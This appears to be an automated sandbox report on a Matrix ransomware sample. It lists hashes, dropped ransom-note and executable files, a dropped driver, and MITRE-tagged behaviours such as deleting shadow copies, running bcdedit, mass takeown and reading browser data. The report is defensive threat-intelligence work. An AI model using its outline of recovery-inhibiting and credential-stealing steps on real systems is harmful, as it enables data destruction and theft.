matrix | 3cdc847f4ca7e263873e7b8fe077060c9c76c6e5d976ffea2d78b7c652f1f615

Analysis

max time kernel
140s
max time network
126s
platform
windows10_x64
resource
win10v20201028
submitted
09-03-2021 09:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
Size

1.3MB
MD5

2c52f3918b636736bdf0022c64115b26
SHA1

88cf55ae8c77ed23219e7c8fe794afa93301ad6d
SHA256

224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914
SHA512

551f22bc10ceb1af2d6f8da6a27ec842176a14108383a2d46a37f4ee3bdfda0b08732aa5549e4a07d3dc337f1ebb07ca1852eb7b0ed9320fe5117b2d5cb62495

Score

10^/10

matrix discovery evasion persistence ransomware spyware upx

Malware Config

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

description	ioc	Process
File created	C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ro-ro\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\root\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fi-fi\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ca-es\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fr-fr\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\it-it\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-cn\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-cn\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ru-ru\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\fr-fr\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\it-it\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ro-ro\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\zh-tw\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tr\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\sl-si\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\da-dk\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\up70r7vk.default-release\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\uk-ua\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nb-no\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\uk-ua\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\uk-ua\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\ENU\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\hr-hr\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\css\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{25e9a94a-1201-4dd4-9523-90028a3cacea}\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\it-it\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ru-ru\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Users\All Users\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sl-si\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ro-ro\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\uk-ua\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sk-sk\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Users\Public\Downloads\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\nb-no\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\es\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\pt-br\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\xh-ZA\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\zh-tw\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ro-ro\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\nb-no\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\pt-br\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\fi-fi\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\sv-se\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files\Google\Chrome\Application\86.0.4240.111\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\da-dk\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\PenWorkspace\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themes\dark\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\up70r7vk.default-release\storage\default\moz-extension+++3e4b3ecf-ae02-46ad-9b52-ce84693df121^userContextId=4294967295\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sv-se\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\tr-tr\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fr-fr\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
4328	bcdedit.exe
5052	bcdedit.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	YDR1ohI764.exe

Executes dropped EXE 64 IoCs

pid	Process
2880	NWIILmaM.exe
4920	YDR1ohI7.exe
4960	YDR1ohI764.exe
2736	YDR1ohI7.exe
2004	YDR1ohI7.exe
4440	YDR1ohI7.exe
4396	YDR1ohI7.exe
4668	YDR1ohI7.exe
4552	YDR1ohI7.exe
4856	YDR1ohI7.exe
4892	YDR1ohI7.exe
2144	YDR1ohI7.exe
5116	YDR1ohI7.exe
4764	YDR1ohI7.exe
4804	YDR1ohI7.exe
4936	YDR1ohI7.exe
4852	YDR1ohI7.exe
2840	YDR1ohI7.exe
3816	YDR1ohI7.exe
4460	YDR1ohI7.exe
4292	YDR1ohI7.exe
4520	YDR1ohI7.exe
4288	YDR1ohI7.exe
4356	YDR1ohI7.exe
1596	YDR1ohI7.exe
276	YDR1ohI7.exe
4272	YDR1ohI7.exe
4476	YDR1ohI7.exe
4872	YDR1ohI7.exe
2796	YDR1ohI7.exe
436	YDR1ohI7.exe
1196	YDR1ohI7.exe
4380	YDR1ohI7.exe
4316	YDR1ohI7.exe
5088	YDR1ohI7.exe
2288	YDR1ohI7.exe
4548	YDR1ohI7.exe
5044	YDR1ohI7.exe
4408	YDR1ohI7.exe
5096	YDR1ohI7.exe
1348	YDR1ohI7.exe
280	YDR1ohI7.exe
3596	YDR1ohI7.exe
4940	YDR1ohI7.exe
5072	YDR1ohI7.exe
4540	YDR1ohI7.exe
4696	YDR1ohI7.exe
4836	YDR1ohI7.exe
4824	YDR1ohI7.exe
4488	YDR1ohI7.exe
4468	YDR1ohI7.exe
5016	YDR1ohI7.exe
5140	YDR1ohI7.exe
5248	YDR1ohI7.exe
5268	YDR1ohI7.exe
5376	YDR1ohI7.exe
5396	YDR1ohI7.exe
5504	YDR1ohI7.exe
5524	YDR1ohI7.exe
5628	YDR1ohI7.exe
5644	YDR1ohI7.exe
5748	YDR1ohI7.exe
5764	YDR1ohI7.exe
5868	YDR1ohI7.exe

Modifies extensions of user files 1 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\DenyRevoke.tiff	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe

Sets service image path in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 57 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000100000001ab66-23.dat	upx
behavioral2/files/0x000100000001ab66-24.dat	upx
behavioral2/files/0x000100000001ab66-33.dat	upx
behavioral2/files/0x000100000001ab66-35.dat	upx
behavioral2/files/0x000100000001ab66-41.dat	upx
behavioral2/files/0x000100000001ab66-43.dat	upx
behavioral2/files/0x000100000001ab66-49.dat	upx
behavioral2/files/0x000100000001ab66-51.dat	upx
behavioral2/files/0x000100000001ab66-58.dat	upx
behavioral2/files/0x000100000001ab66-60.dat	upx
behavioral2/files/0x000100000001ab66-67.dat	upx
behavioral2/files/0x000100000001ab66-69.dat	upx
behavioral2/files/0x000100000001ab66-75.dat	upx
behavioral2/files/0x000100000001ab66-77.dat	upx
behavioral2/files/0x000100000001ab66-84.dat	upx
behavioral2/files/0x000100000001ab66-86.dat	upx
behavioral2/files/0x000100000001ab66-89.dat	upx
behavioral2/files/0x000100000001ab66-90.dat	upx
behavioral2/files/0x000100000001ab66-91.dat	upx
behavioral2/files/0x000100000001ab66-92.dat	upx
behavioral2/files/0x000100000001ab66-93.dat	upx
behavioral2/files/0x000100000001ab66-94.dat	upx
behavioral2/files/0x000100000001ab66-95.dat	upx
behavioral2/files/0x000100000001ab66-96.dat	upx
behavioral2/files/0x000100000001ab66-97.dat	upx
behavioral2/files/0x000100000001ab66-98.dat	upx
behavioral2/files/0x000100000001ab66-99.dat	upx
behavioral2/files/0x000100000001ab66-100.dat	upx
behavioral2/files/0x000100000001ab66-101.dat	upx
behavioral2/files/0x000100000001ab66-102.dat	upx
behavioral2/files/0x000100000001ab66-103.dat	upx
behavioral2/files/0x000100000001ab66-104.dat	upx
behavioral2/files/0x000100000001ab66-105.dat	upx
behavioral2/files/0x000100000001ab66-106.dat	upx
behavioral2/files/0x000100000001ab66-107.dat	upx
behavioral2/files/0x000100000001ab66-108.dat	upx
behavioral2/files/0x000100000001ab66-109.dat	upx
behavioral2/files/0x000100000001ab66-110.dat	upx
behavioral2/files/0x000100000001ab66-111.dat	upx
behavioral2/files/0x000100000001ab66-112.dat	upx
behavioral2/files/0x000100000001ab66-113.dat	upx
behavioral2/files/0x000100000001ab66-114.dat	upx
behavioral2/files/0x000100000001ab66-115.dat	upx
behavioral2/files/0x000100000001ab66-116.dat	upx
behavioral2/files/0x000100000001ab66-117.dat	upx
behavioral2/files/0x000100000001ab66-118.dat	upx
behavioral2/files/0x000100000001ab66-119.dat	upx
behavioral2/files/0x000100000001ab66-120.dat	upx
behavioral2/files/0x000100000001ab66-121.dat	upx
behavioral2/files/0x000100000001ab66-122.dat	upx
behavioral2/files/0x000100000001ab66-123.dat	upx
behavioral2/files/0x000100000001ab66-124.dat	upx
behavioral2/files/0x000100000001ab66-125.dat	upx
behavioral2/files/0x000100000001ab66-126.dat	upx
behavioral2/files/0x000100000001ab66-127.dat	upx
behavioral2/files/0x000100000001ab66-128.dat	upx
behavioral2/files/0x000100000001ab66-129.dat	upx

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5456	takeown.exe
5056	takeown.exe
4880	takeown.exe
5960	takeown.exe
5840	takeown.exe
5768	takeown.exe
5340	takeown.exe
5920	takeown.exe
4728	takeown.exe
5032	takeown.exe
4860	takeown.exe
5600	takeown.exe
6080	takeown.exe
4708	takeown.exe
5636	takeown.exe
6036	takeown.exe
5148	takeown.exe
4912	takeown.exe
5084	takeown.exe
284	takeown.exe
5712	takeown.exe
5216	takeown.exe
5176	takeown.exe
5100	takeown.exe
4428	takeown.exe
6024	takeown.exe
1604	takeown.exe
5168	takeown.exe
5464	takeown.exe
5240	takeown.exe
5300	takeown.exe
4640	takeown.exe
4400	takeown.exe
4812	takeown.exe
5292	takeown.exe
4792	takeown.exe
5348	takeown.exe
5876	takeown.exe
5092	takeown.exe
5812	takeown.exe
5520	takeown.exe
5280	takeown.exe
4716	takeown.exe
1528	takeown.exe
5720	takeown.exe
292	takeown.exe
5476	takeown.exe
5132	takeown.exe
4444	takeown.exe
5592	takeown.exe
6032	takeown.exe
5408	takeown.exe
4752	takeown.exe
288	takeown.exe
296	takeown.exe
2604	takeown.exe
2240	takeown.exe
2180	takeown.exe
4704	takeown.exe
6128	takeown.exe
5392	takeown.exe
4780	takeown.exe
5220	takeown.exe
4884	takeown.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

Drops desktop.ini file(s) 26 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Users\Public\desktop.ini	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files\desktop.ini	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\E:	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened (read-only)	\??\L:	YDR1ohI764.exe
File opened (read-only)	\??\Z:	YDR1ohI764.exe
File opened (read-only)	\??\O:	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened (read-only)	\??\S:	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened (read-only)	\??\I:	YDR1ohI764.exe
File opened (read-only)	\??\Q:	YDR1ohI764.exe
File opened (read-only)	\??\V:	YDR1ohI764.exe
File opened (read-only)	\??\W:	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened (read-only)	\??\Q:	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened (read-only)	\??\K:	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened (read-only)	\??\J:	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened (read-only)	\??\H:	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened (read-only)	\??\F:	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened (read-only)	\??\E:	YDR1ohI764.exe
File opened (read-only)	\??\H:	YDR1ohI764.exe
File opened (read-only)	\??\Y:	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened (read-only)	\??\P:	YDR1ohI764.exe
File opened (read-only)	\??\S:	YDR1ohI764.exe
File opened (read-only)	\??\N:	YDR1ohI764.exe
File opened (read-only)	\??\P:	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened (read-only)	\??\N:	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened (read-only)	\??\G:	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened (read-only)	\??\R:	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened (read-only)	\??\O:	YDR1ohI764.exe
File opened (read-only)	\??\W:	YDR1ohI764.exe
File opened (read-only)	\??\X:	YDR1ohI764.exe
File opened (read-only)	\??\U:	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened (read-only)	\??\L:	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened (read-only)	\??\J:	YDR1ohI764.exe
